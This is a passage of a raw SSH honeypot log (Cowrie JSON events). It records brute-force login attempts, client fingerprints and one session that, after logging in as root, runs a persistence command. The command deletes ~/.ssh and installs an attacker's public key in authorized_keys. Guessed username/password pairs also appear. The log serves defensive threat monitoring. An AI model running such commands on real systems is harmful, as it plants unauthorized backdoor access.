"ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T20:01:43.121913Z","src_ip":"212.227.235.229","session":"f06af231d0b4"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCEoVHIUiKBWdT0hU2B8GNkqXZAbPoADj3xh+da2pnk4uuhdoM5SIIZ2/Lh/MG1gogomxGFuTDhslSNvJcFwRauaYPek1l3Nix2HWEjzfD1PZykb9z1ojqx1oa4OmODHKoujsBbaz53KxsZGRr4mIesdAfVFl6aEs4N2Q03h2kCV0Lb2rhoMSjnU7tSHMJdRMX1gGwyXZkNWqj5X9I+dqq4LXFVCV0E5pNsHJbZq+r3JaxudORI0TJU5g5HRWA7vas157jgXs7KMITBypdKGtxWCTDRpi8jBLj7C4HfroP3BQW/EFN01w7EmWJoc9iQ6OKSrjsnYaj0Q6bwrgJsZYMl","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","sensor":"my-vps","timestamp":"2025-09-08T20:01:43.377974Z","src_ip":"212.227.235.229","session":"f06af231d0b4"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCEoVHIUiKBWdT0hU2B8GNkqXZAbPoADj3xh+da2pnk4uuhdoM5SIIZ2/Lh/MG1gogomxGFuTDhslSNvJcFwRauaYPek1l3Nix2HWEjzfD1PZykb9z1ojqx1oa4OmODHKoujsBbaz53KxsZGRr4mIesdAfVFl6aEs4N2Q03h2kCV0Lb2rhoMSjnU7tSHMJdRMX1gGwyXZkNWqj5X9I+dqq4LXFVCV0E5pNsHJbZq+r3JaxudORI0TJU5g5HRWA7vas157jgXs7KMITBypdKGtxWCTDRpi8jBLj7C4HfroP3BQW/EFN01w7EmWJoc9iQ6OKSrjsnYaj0Q6bwrgJsZYMl","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T20:01:43.378565Z","src_ip":"212.227.235.229","session":"f06af231d0b4"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCEoVHIUiKBWdT0hU2B8GNkqXZAbPoADj3xh+da2pnk4uuhdoM5SIIZ2/Lh/MG1gogomxGFuTDhslSNvJcFwRauaYPek1l3Nix2HWEjzfD1PZykb9z1ojqx1oa4OmODHKoujsBbaz53KxsZGRr4mIesdAfVFl6aEs4N2Q03h2kCV0Lb2rhoMSjnU7tSHMJdRMX1gGwyXZkNWqj5X9I+dqq4LXFVCV0E5pNsHJbZq+r3JaxudORI0TJU5g5HRWA7vas157jgXs7KMITBypdKGtxWCTDRpi8jBLj7C4HfroP3BQW/EFN01w7EmWJoc9iQ6OKSrjsnYaj0Q6bwrgJsZYMl","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","sensor":"my-vps","timestamp":"2025-09-08T20:01:43.484015Z","src_ip":"212.227.235.229","session":"f06af231d0b4"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCEoVHIUiKBWdT0hU2B8GNkqXZAbPoADj3xh+da2pnk4uuhdoM5SIIZ2/Lh/MG1gogomxGFuTDhslSNvJcFwRauaYPek1l3Nix2HWEjzfD1PZykb9z1ojqx1oa4OmODHKoujsBbaz53KxsZGRr4mIesdAfVFl6aEs4N2Q03h2kCV0Lb2rhoMSjnU7tSHMJdRMX1gGwyXZkNWqj5X9I+dqq4LXFVCV0E5pNsHJbZq+r3JaxudORI0TJU5g5HRWA7vas157jgXs7KMITBypdKGtxWCTDRpi8jBLj7C4HfroP3BQW/EFN01w7EmWJoc9iQ6OKSrjsnYaj0Q6bwrgJsZYMl","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T20:01:43.484913Z","src_ip":"212.227.235.229","session":"f06af231d0b4"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:51.587752Z","src_ip":"212.227.125.160","session":"957cd3d2333c"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":44126,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c13afce9d6b","protocol":"ssh","message":"New connection: 77.75.56.63:44126 (1.2.3.4:22) [session: 2c13afce9d6b]","sensor":"my-vps","timestamp":"2025-09-08T20:01:51.917546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:01:51.918696Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:01:51.954652Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.login.success","username":"root","password":"Dev@123","message":"login attempt [root/Dev@123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:01:52.142200Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:01:52.264606Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:01:52.265280Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:01:52.266299Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:52.303260Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:01:52.428926Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:01:52.429670Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:01:52.468179Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:52.469102Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":44140,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bd193a04453","protocol":"ssh","message":"New connection: 77.75.56.63:44140 (1.2.3.4:22) [session: 5bd193a04453]","sensor":"my-vps","timestamp":"2025-09-08T20:01:52.504818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:01:52.505686Z","src_ip":"77.75.56.63","session":"5bd193a04453"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:01:52.543547Z","src_ip":"77.75.56.63","session":"5bd193a04453"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:01:52.733650Z","src_ip":"77.75.56.63","session":"5bd193a04453"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:53.018103Z","src_ip":"212.227.235.229","session":"f06af231d0b4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:53.771559Z","src_ip":"77.75.56.63","session":"5bd193a04453"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":44150,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b5c8480b9f5","protocol":"ssh","message":"New connection: 77.75.56.63:44150 (1.2.3.4:22) [session: 2b5c8480b9f5]","sensor":"my-vps","timestamp":"2025-09-08T20:01:53.834204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:01:53.834923Z","src_ip":"77.75.56.63","session":"2b5c8480b9f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:01:53.886601Z","src_ip":"77.75.56.63","session":"2b5c8480b9f5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:01:54.101668Z","src_ip":"77.75.56.63","session":"2b5c8480b9f5"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:54.156708Z","src_ip":"77.75.56.63","session":"2c13afce9d6b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:54.175048Z","src_ip":"77.75.56.63","session":"2b5c8480b9f5"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":41792,"dst_ip":"1.2.3.4","dst_port":22,"session":"da7765e9bcbc","protocol":"ssh","message":"New connection: 216.107.136.92:41792 (1.2.3.4:22) [session: da7765e9bcbc]","sensor":"my-vps","timestamp":"2025-09-08T20:02:10.041928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:02:10.042789Z","src_ip":"216.107.136.92","session":"da7765e9bcbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:02:10.132948Z","src_ip":"216.107.136.92","session":"da7765e9bcbc"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T20:02:10.534948Z","src_ip":"216.107.136.92","session":"da7765e9bcbc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:02:11.629097Z","src_ip":"216.107.136.92","session":"da7765e9bcbc"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":47484,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bb3bca73086","protocol":"ssh","message":"New connection: 103.206.72.2:47484 (1.2.3.4:22) [session: 6bb3bca73086]","sensor":"my-vps","timestamp":"2025-09-08T20:02:41.959869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:02:41.962604Z","src_ip":"103.206.72.2","session":"6bb3bca73086"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:02:42.143082Z","src_ip":"103.206.72.2","session":"6bb3bca73086"}
{"eventid":"cowrie.login.failed","username":"zhangyaohua","password":"qwerty","message":"login attempt [zhangyaohua/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T20:02:42.854887Z","src_ip":"103.206.72.2","session":"6bb3bca73086"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:02:44.038015Z","src_ip":"103.206.72.2","session":"6bb3bca73086"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":37698,"dst_ip":"1.2.3.4","dst_port":22,"session":"c51cc165a95c","protocol":"ssh","message":"New connection: 77.75.56.63:37698 (1.2.3.4:22) [session: c51cc165a95c]","sensor":"my-vps","timestamp":"2025-09-08T20:02:55.960387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:02:55.961900Z","src_ip":"77.75.56.63","session":"c51cc165a95c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:02:55.998784Z","src_ip":"77.75.56.63","session":"c51cc165a95c"}
{"eventid":"cowrie.login.failed","username":"ctf","password":"111111","message":"login attempt [ctf/111111] failed","sensor":"my-vps","timestamp":"2025-09-08T20:02:56.193537Z","src_ip":"77.75.56.63","session":"c51cc165a95c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:02:57.232392Z","src_ip":"77.75.56.63","session":"c51cc165a95c"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":48914,"dst_ip":"1.2.3.4","dst_port":22,"session":"637b6dea37b2","protocol":"ssh","message":"New connection: 77.75.56.63:48914 (1.2.3.4:22) [session: 637b6dea37b2]","sensor":"my-vps","timestamp":"2025-09-08T20:04:00.889082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:04:00.890010Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 